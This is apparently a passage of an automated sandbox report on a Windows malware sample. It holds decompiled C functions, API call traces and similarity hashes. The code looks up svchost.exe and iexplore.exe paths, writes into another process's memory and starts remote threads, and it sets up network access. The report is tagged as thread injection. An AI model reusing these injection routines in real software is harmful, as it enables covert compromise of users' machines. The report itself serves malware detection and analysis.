				if( *(_t70 - 0x30) == 0x78 ||  *(_t70 - 0x30) == 0x1bc8) {
					__eflags =  *(_t70 - 0x24);
					if( *(_t70 - 0x24) == 0) {
						goto L15;
					}
					_t51 = ReadProcessMemory(_t61,  *(_t70 - 0x28), _t70 - 0xdc0,  *(_t70 - 0x24), _t70 - 0x34);
					__eflags = _t51;
					if(_t51 == 0) {
						goto L16;
					}
					_t52 =  *(_t70 - 0x30);
					_t62 =  *(_t70 - 0x20);
					_t69 = _t52 +  *(_t70 - 0x20);
					 *((intOrPtr*)(_t70 - 0x3c)) = _t69;
					__eflags = _t52 - 0x78;
					if(_t52 == 0x78) {
						_t56 = 0xd80 -  *((intOrPtr*)(_t69 + 8));
						 *((intOrPtr*)(_t70 - 0x40)) = 0xd80;
						__eflags =  *(_t70 - 0x24) - 0xd80;
						if( *(_t70 - 0x24) > 0xd80) {
							_t62 =  *(_t70 - 0x24) - _t56;
							__eflags =  *(_t70 - 0x24) - _t56;
							E001D176E(_t66,  *(_t70 - 0x24) - _t56, _t69, 0,  *(_t70 - 0x24) - _t56);
						}
					}
					_t54 = E001D20DA(_t61, _t62, _t69, _t70 - 0xdc0,  *(_t70 - 0x24));
					goto L14;
				} else {
					if( *(_t70 - 0x30) != 0x3708) {
						L15:
						 *(_t70 - 0x1c) = 1;
						 *( *(_t70 - 0x20) + 0x5c) =  *( *(_t70 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_t59 =  *(_t70 - 0x20) + 0x3708;
						 *((intOrPtr*)(_t70 - 0x38)) = _t59;
						_push( *_t59);
						if( *(_t70 - 0x28) == 0) {
							_t54 = ResetEvent();
						} else {
							_t54 = SetEvent();
						}
						L14:
						 *(_t70 - 0x1c) = _t54;
					}
					goto L16;
				}
			}

0x001d2165
0x001d216a
0x001d216f
0x001d2174
0x001d2180
0x001d2182
0x001d2190
0x001d219f
0x001d227a
0x001d227a
0x001d2281
0x001d2281
0x001d21af
0x001d21b8
0x00000000
0x00000000
0x001d21c2
0x001d21fd
0x001d2201
0x00000000
0x00000000
0x001d2215
0x001d2217
0x001d2219
0x00000000
0x00000000
0x001d221b
0x001d221e
0x001d2221
0x001d2224
0x001d2227
0x001d222a
0x001d2231
0x001d2234
0x001d2237
0x001d223a
0x001d223f
0x001d223f
0x001d2245
0x001d2245
0x001d223a
0x001d2255
0x00000000
0x001d21cd
0x001d21d4
0x001d225f
0x001d225f
0x001d2269
0x001d21da
0x001d21dd
0x001d21e2
0x001d21e5
0x001d21eb
0x001d21f5
0x001d21ed
0x001d21ed
0x001d21ed
0x001d225a
0x001d225a
0x001d225a
0x00000000
0x001d21d4

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D217A
ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D219B
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21B4
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21ED
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21F5
ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 001D2215

Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147

Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5

ExitThread.KERNEL32 ref: 001D2281

Strings

x, xrefs: 001D21BE

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3734, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 50 Total matches: 6
registrystring

Similarity

Total matches: 6
API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat
String ID: [FILE]$SystemRoot$[FILE]
API String ID: 4133047914-1656360392
Opcode ID: ae84fe3816e58394a110c5285e10b2d815e972e04ba8194b59fa15e7161023db
Instruction ID: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
Opcode Fuzzy Hash: 09D02ECA440F87F8661BB080082DF82B092FE633C04EC63003440592C18F8CB16FEF90
Instruction Fuzzy Hash: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653

C-Code - Quality: 100%

			E001D3734(void* __ecx, char* _a4, void* _a8) {
				int _v8;
				int _v12;
				char* _t13;
				char* _t23;
				long _t27;
				void* _t29;

				_t27 = _a8;
				_t23 = 0;
				_t29 =  *0x1d506c - _t23; // 0x0
				if(_t29 != 0 || GetEnvironmentVariableA("SystemRoot", _a4, _t27) == 0) {
					if(RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe",  &_a8) == 0) {
						_v8 = _t27;
						if(RegQueryValueExA(_a8, _t23, _t23,  &_v12, _a4,  &_v8) == 0) {
							_t23 = 1;
						}
						RegCloseKey(_a8);
					}
					_t13 = _t23;
				} else {
					lstrcatA(_a4, "\\System32\\svchost.exe");
					_t13 = 1;
				}
				return _t13;
			}

0x001d373a
0x001d373e
0x001d3740
0x001d3746
0x001d3784
0x001d3796
0x001d37a1
0x001d37a5
0x001d37a5
0x001d37a9
0x001d37a9
0x001d37af
0x001d375b
0x001d3763
0x001d376b
0x001d376b
0x001d37b4

APIs

GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9

Strings

SystemRoot, xrefs: 001D374C
Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 001D3772
\System32\svchost.exe, xrefs: 001D375B

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D27E6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116 Total matches: 6
threadinjection

Similarity

Total matches: 6
API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects
String ID: <
API String ID: 2446352009-4251816714
Opcode ID: c8242842e98a66eb1eacbd90598b53cfcf33de66ab7a76e9081f6078d45f9eb3
Instruction ID: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
Opcode Fuzzy Hash: ED0168420642E5B3F54776C41649B2051A1EF43AF5E2C032379BDB26C81B88AE29BF89
Instruction Fuzzy Hash: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30

C-Code - Quality: 93%

			E001D27E6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				void* _t73;
				void* _t78;
				void* _t83;
				void* _t84;

				_push(0xe4);
				_push(0x1d13d0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x28)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E001D384D(_t84 - 0xb4, 0, 0x40);
				 *((short*)(_t84 - 0xb4)) = 0x3c;
				E001D3834(_t84 - 0xf4, _t84 - 0xb4, 0x40);
				E001D3864(_t84 - 0x74, _t84 - 0xf4, _t84 - 0xb4);
				 *((intOrPtr*)(_t84 - 0x40)) = E001D3C08;
				 *((intOrPtr*)(_t84 - 0x3c)) = E001D3C9A;
				 *((intOrPtr*)(_t84 - 0x38)) = E001D1C6D;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x34) = _t83;
				 *_t83 = 0x238;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x28)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t73 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E001D1722(E001D2997), _t83, 4, _t84 - 0x2c);
					 *(_t84 - 0x1c) = _t73;
					if(_t73 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *((intOrPtr*)(_t84 - 0x24)) = E001D17D0;
				_t78 = E001D1CFD;
				_t56 =  *((intOrPtr*)(_t83 + 0x6c)) - 3;
				if(_t56 == 0) {
					L7:
					_t78 = 0;
					goto L8;
				} else {
					if(_t56 != 1) {
						L8:
						_t76 = _t83 + 0x1bc8;
						if(E001D1E99(_t83, _t83 + 0x1bc8, _t78, 2) == 0 || E001D1E99(_t83, _t83 + 0x78,  *((intOrPtr*)(_t84 - 0x24)), 1) == 0) {
							L17:
							return E001D173E(E001D38F2(_t84 - 0x74));
						} else {
							 *(_t84 - 4) = 0;
							if( *((intOrPtr*)(_t84 - 0x28)) == 0) {
								E001D2F13(_t76, 0);
							}
							if( *(_t84 - 0x1c) == 0) {
								do {
									_push(_t84 - 0x74);
									__eflags = E001D2522(0, _t83, __eflags);
								} while (__eflags != 0);
								goto L16;
							} else {
								ResumeThread( *(_t84 - 0x1c));
								WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
								CloseHandle( *(_t84 - 0x1c));
								L16:
								 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
								goto L17;
							}
						}
					}
					 *((intOrPtr*)(_t84 - 0x24)) = 0;
					goto L7;
				}
			}

0x001d27e6
0x001d27eb
0x001d27f0
0x001d27f7
0x001d27fa
0x001d27fd
0x001d280a
0x001d2817
0x001d281c
0x001d2835
0x001d284c
0x001d2851
0x001d2858
0x001d285f
0x001d2866
0x001d2869
0x001d286c
0x001d2872
0x001d287c
0x001d2887
0x001d288e
0x001d28ac
0x001d28b2
0x001d28b7
0x001d28b9
0x001d28b9
0x001d28b7
0x001d28c0
0x001d28c7
0x001d28cf
0x001d28d2
0x001d28da
0x001d28da
0x00000000
0x001d28d4
0x001d28d5
0x001d28dc
0x001d28dc
0x001d28ee
0x001d2954
0x001d2962
0x001d2903
0x001d2903
0x001d2909
0x001d290d
0x001d290d
0x001d2915
0x001d293a
0x001d293d
0x001d2943
0x001d2943
0x00000000
0x001d2917
0x001d291a
0x001d2929
0x001d2932
0x001d2950
0x001d2950
0x00000000
0x001d2950
0x001d2915
0x001d28ee
0x001d28d7
0x00000000
0x001d28d7

APIs

GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808

Part of subcall function 001D3864: GetVersion.KERNEL32 ref: 001D3881

GetStdHandle.KERNEL32(000000F6), ref: 001D2880
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC

Part of subcall function 001D1E99: InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
Part of subcall function 001D1E99: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
Part of subcall function 001D1E99: SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E

CloseHandle.KERNEL32(?), ref: 001D2932

Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C

ResumeThread.KERNEL32(?), ref: 001D291A
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929

Strings

<, xrefs: 001D281C

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2648, Relevance: 12.1, APIs: 8, Instructions: 110 Total matches: 5
threadwindownetwork

Similarity

Total matches: 5
API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup
String ID:
API String ID: 2542947916-0
Opcode ID: 2b16ed5e52240c4d80d8b10e68765e774bd0f7290044ab9ce1d8eea53ab31f33
Instruction ID: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
Opcode Fuzzy Hash: E9014C02028CA5E7D0272B911CAA73B6042FF41FFCF9DA79271FC691C16F8596196F41
Instruction Fuzzy Hash: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2

C-Code - Quality: 91%

			E001D2648(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t42;
				void* _t54;
				void* _t56;
				void* _t63;
				void* _t65;
				void** _t71;
				void* _t75;
				void* _t76;

				_push(0x244);
				_push(0x1d13a0);
				E001D1637(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				E001D384D(_t76 - 0xa8, 0, 0x80);
				 *((intOrPtr*)(_t76 - 0x20)) = 5;
				while(1) {
					L1:
					 *(_t76 - 0x24) = 0;
					 *((intOrPtr*)(_t76 - 0x20)) =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					_t42 =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					if(_t42 == 0) {
						break;
					}
					_t56 = _t42 - 1;
					if(_t56 == 0) {
						_t69 =  *((intOrPtr*)(_t76 + 8));
						_t13 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 2; // 0x0
						if(E001D2CC7(_t76 - 0xa8,  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 6, _t13,  *((intOrPtr*)(_t69 + 4))) <= 0) {
							L14:
							E001D15A3(_t76 - 0xa8);
							while( *((intOrPtr*)(_t76 - 0x1c)) != 0) {
								 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
								 *(_t76 - 4) = 0;
								L001D32DA();
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
							}
							return E001D173E(PostMessageA( *0x1d50c0, 0x400, 1, 2));
						}
						if(PeekMessageA(_t76 - 0xc4, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
						goto L14;
					}
					_t63 = _t56 - 1;
					if(_t63 == 0) {
						continue;
					}
					if(_t63 != 1) {
						goto L14;
					}
					_t65 = _t76 - 0x254;
					_push(_t65);
					_push(0x101);
					L001D1454();
					if(_t65 != 0) {
						goto L14;
					}
					 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
				}
				_t75 = LocalAlloc(0x40, 0x4464);
				if(_t75 != 0) {
					 *(_t75 + 0x6c) = 1;
					 *(_t75 + 0x70) =  *(_t75 + 0x70) | 0xffffffff;
					 *(_t75 + 0x5c) =  *(_t75 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t75 + 0x3ba8)) = GetCurrentThreadId();
					_t23 = _t75 + 0x3c58; // 0x3c58
					E001D3834(_t23, _t76 - 0xa8, 0x80);
					 *(_t75 + 0x6c) = 3;
					_t54 = CreateThread(0, 0, E001D3722, _t75, 0, _t76 - 0x28);
					_t26 = _t75 + 0x3ba4; // 0x3ba4
					_t71 = _t26;
					 *_t71 = _t54;
					if(_t54 != 0) {
						 *(_t76 - 0x24) = 1;
						 *((intOrPtr*)(_t76 - 0x74)) = 0;
						SetThreadPriority( *_t71, 0xfffffff1);
					}
				}
				E001D1ABC(_t75,  *(_t76 - 0x24));
				if( *(_t76 - 0x24) != 0) {
					goto L1;
				} else {
					goto L14;
				}
			}

0x001d2648
0x001d264d
0x001d2652
0x001d2659
0x001d266a
0x001d266f
0x001d2676
0x001d2676
0x001d2676
0x001d2679
0x001d267f
0x001d2680
0x00000000
0x00000000
0x001d2682
0x001d2683
0x001d26ad
0x001d26b5
0x001d26cb
0x001d277b
0x001d2782
0x001d2787
0x001d278c
0x001d278f
0x001d2792
0x001d2797
0x001d2797
0x001d27c6
0x001d27c6
0x001d26e6
0x00000000
0x00000000
0x00000000
0x001d26e8
0x001d2685
0x001d2686
0x00000000
0x00000000
0x001d2689
0x00000000
0x00000000
0x001d268f
0x001d2695
0x001d2696
0x001d269b
0x001d26a2
0x00000000
0x00000000
0x001d26a8
0x001d26a8
0x001d26fa
0x001d26fe
0x001d2700
0x001d2707
0x001d270b
0x001d2715
0x001d2723
0x001d272a
0x001d272f
0x001d2743
0x001d2749
0x001d2749
0x001d274f
0x001d2753
0x001d2755
0x001d275c
0x001d2763
0x001d2763
0x001d2753
0x001d276d
0x001d2775
0x00000000
0x00000000
0x00000000
0x00000000

APIs

WSAStartup.WSOCK32(00000101,?,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D269B

Part of subcall function 001D2CC7: LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
Part of subcall function 001D2CC7: GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
Part of subcall function 001D2CC7: FreeLibrary.KERNEL32(?), ref: 001D2D3F
Part of subcall function 001D2CC7: inet_ntoa.WSOCK32(?), ref: 001D2D5E
Part of subcall function 001D2CC7: wsprintfA.USER32 ref: 001D2DBF

PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 001D26DE
LocalAlloc.KERNEL32(00000040,00004464,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D26F4
GetCurrentThreadId.KERNEL32 ref: 001D270F
CreateThread.KERNEL32(00000000,00000000,001D3722,00000000,00000000,?), ref: 001D2743
SetThreadPriority.KERNEL32(00003BA4,000000F1), ref: 001D2763

Part of subcall function 001D1ABC: WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
Part of subcall function 001D1ABC: TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
Part of subcall function 001D1ABC: CloseHandle.KERNEL32(?), ref: 001D1B0E
Part of subcall function 001D1ABC: LocalFree.KERNEL32(?,?), ref: 001D1B15

Part of subcall function 001D15A3: FreeLibrary.KERNEL32(00000000), ref: 001D15D1

WSACleanup.WSOCK32(?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D2792
PostMessageA.USER32(00000400,00000001,00000002), ref: 001D27BB

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D19F3, Relevance: 12.1, APIs: 8, Instructions: 53 Total matches: 6
synchronization

Similarity

Total matches: 6
API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject
String ID:
API String ID: 4003875101-0
Opcode ID: 04216faaea4ba07e98bcd26563bf42db8e4c0576a096f68bb43e63f5af89c022
Instruction ID: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
Opcode Fuzzy Hash: D9E08C43914E1AD0C8A7FDC0082E7061E61B76D1E2E5EC5053282436417F1EE0089F89
Instruction Fuzzy Hash: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7

C-Code - Quality: 100%

			E001D19F3(intOrPtr _a4) {
				signed char _t11;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed char* _t24;
				void** _t27;
				intOrPtr _t29;
				void* _t30;
				struct _CRITICAL_SECTION* _t32;

				_t29 = _a4;
				_t24 = _t29 + 0x1b44;
				_t11 =  *_t24;
				if((_t11 & 0x00000001) != 0) {
					_t32 = _t29 + 0x1b18;
					 *_t24 = _t11 & 0x000000fe;
					EnterCriticalSection(_t32);
					_t13 =  *(_t29 + 0x1b40);
					if(_t13 != 0) {
						SetEvent(_t13);
					}
					_t14 =  *(_t29 + 0x1b10);
					if(_t14 != 0) {
						SetEvent(_t14);
					}
					_t27 = _t29 + 0x1b0c;
					_t15 =  *_t27;
					if(_t15 != 0) {
						WaitForSingleObject(_t15, 0x7d0);
						CloseHandle( *_t27);
						 *_t27 =  *_t27 & 0x00000000;
					}
					_t16 =  *(_t29 + 0x1b40);
					if(_t16 != 0) {
						_t16 = CloseHandle(_t16);
					}
					_t30 =  *(_t29 + 0x1b10);
					if(_t30 != 0) {
						_t16 = CloseHandle(_t30);
					}
					DeleteCriticalSection(_t32);
					return _t16;
				}
				return _t11;
			}

0x001d19f4
0x001d19f8
0x001d19fe
0x001d1a02
0x001d1a09
0x001d1a10
0x001d1a12
0x001d1a18
0x001d1a26
0x001d1a29
0x001d1a29
0x001d1a2b
0x001d1a33
0x001d1a36
0x001d1a36
0x001d1a3e
0x001d1a44
0x001d1a48
0x001d1a50
0x001d1a58
0x001d1a5a
0x001d1a5a
0x001d1a5d
0x001d1a65
0x001d1a68
0x001d1a68
0x001d1a6a
0x001d1a72
0x001d1a75
0x001d1a75
0x001d1a78
0x00000000
0x001d1a80
0x001d1a82

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
CloseHandle.KERNEL32(?), ref: 001D1A58
CloseHandle.KERNEL32(?), ref: 001D1A68
CloseHandle.KERNEL32(?), ref: 001D1A75
DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2C05, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 6
windowregistrytime

Similarity

Total matches: 6
API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage
String ID:
API String ID: 1289143423-0
Opcode ID: a48adf90a0f1ca95f9f8ccd3f9eb1397de436c8d144647db204e4c52001b9e96
Instruction ID: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
Opcode Fuzzy Hash: ABE0D843065850B3DC4B75752C0C31787917BC9ECAC9C67093056F4248CB87A61CEF43
Instruction Fuzzy Hash: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c

C-Code - Quality: 81%

			E001D2C05(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x1d13f0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x1d5044; // 0x1d0000
				 *0x001D50DC = _t11;
				_t30 = _t35 - 0x138;
				 *0x001D50F0 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x1d50cc);
				 *0x1d50c0 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				_t15 =  *0x1d506c; // 0x0
				asm("sbb eax, eax");
				SetTimer( *0x1d50c0, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x1d50c0 = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E001D173E(0);
			}

0x001d2c05
0x001d2c0a
0x001d2c0f
0x001d2c16
0x001d2c21
0x001d2c26
0x001d2c36
0x001d2c3c
0x001d2c49
0x001d2c4f
0x001d2c5b
0x001d2c61
0x001d2c68
0x001d2c7d
0x001d2c83
0x001d2c98
0x001d2ca2
0x001d2ca2
0x001d2caa
0x001d2cb9
0x001d2cc4

APIs

GetModuleFileNameA.KERNEL32(001D0000,?,00000103,001D50CC,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,001D0000,00000000), ref: 001D2C49
RegisterClassA.USER32 ref: 001D2C4F
CreateWindowExA.USER32 ref: 001D2C55
SetTimer.USER32(00000064,-0000EA60,00000000), ref: 001D2C7D
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D2C8A
TranslateMessage.USER32(?), ref: 001D2C98
DispatchMessageA.USER32(?), ref: 001D2CA2

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2997, Relevance: 9.1, APIs: 6, Instructions: 52 Total matches: 6
memorythreadinjection

Similarity

Total matches: 6
API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory
String ID:
API String ID: 3806972562-0
Opcode ID: d136b9818d58650d9e75ef7e59085fa17e81dc101a90658f0749166ad6ebe984
Instruction ID: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3
Opcode Fuzzy Hash: 17E04F44158F6AE1912A79441A0F72B9014BFD7BF9C0C0B37B138315C11B5E751A6B05
Instruction Fuzzy Hash: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3

C-Code - Quality: 74%

			E001D2997() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_push(0x10);
				_push(0x1d13c0);
				E001D1637(_t40, _t43, _t45);
				 *(_t47 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t44 = GetStdHandle(0xfffffff4);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if( *(_t47 - 0x1c) != 0) {
					_push(_t47 - 0x20);
					_t41 = 4;
					_t46 =  *(_t47 + 8);
					if(WriteProcessMemory(_t44, _t46 + 0x84, _t47 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t44, _t46,  *(_t47 - 0x1c), 0x78, _t47 - 0x20) != 0) {
						 *( *(_t47 - 0x1c) + 0x6c) = _t41;
						 *( *(_t47 - 0x1c) + 0x70) =  *( *(_t47 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t47 - 0x1c) + 0x370c) =  *( *(_t47 - 0x1c) + 0x370c) | _t41;
						 *( *(_t47 - 0x1c) + 0x1bd4) = _t46;
						E001D27E6(_t41, _t42, _t44, _t46,  *( *(_t47 - 0x1c) + 0x370c),  *(_t47 - 0x1c));
					}
					LocalFree( *(_t47 - 0x1c));
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				ExitThread(0);
			}

0x001d2997
0x001d2999
0x001d299e
0x001d29b0
0x001d29bb
0x001d29bd
0x001d29c5
0x001d29ca
0x001d29cd
0x001d29d3
0x001d29e6
0x001d2a00
0x001d2a06
0x001d2a0d
0x001d2a16
0x001d2a1f
0x001d2a1f
0x001d2a27
0x001d2a27
0x001d2a36
0x001d2a3c

APIs

LocalAlloc.KERNEL32(00000040,00004464,001D13C0,00000010), ref: 001D29AA
GetStdHandle.KERNEL32(000000F4), ref: 001D29B5
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 001D29DE
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 001D29F3

Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808
Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F6), ref: 001D2880
Part of subcall function 001D27E6: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC
Part of subcall function 001D27E6: ResumeThread.KERNEL32(?), ref: 001D291A
Part of subcall function 001D27E6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929
Part of subcall function 001D27E6: CloseHandle.KERNEL32(?), ref: 001D2932

LocalFree.KERNEL32(00000000), ref: 001D2A27
ExitThread.KERNEL32 ref: 001D2A3C

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

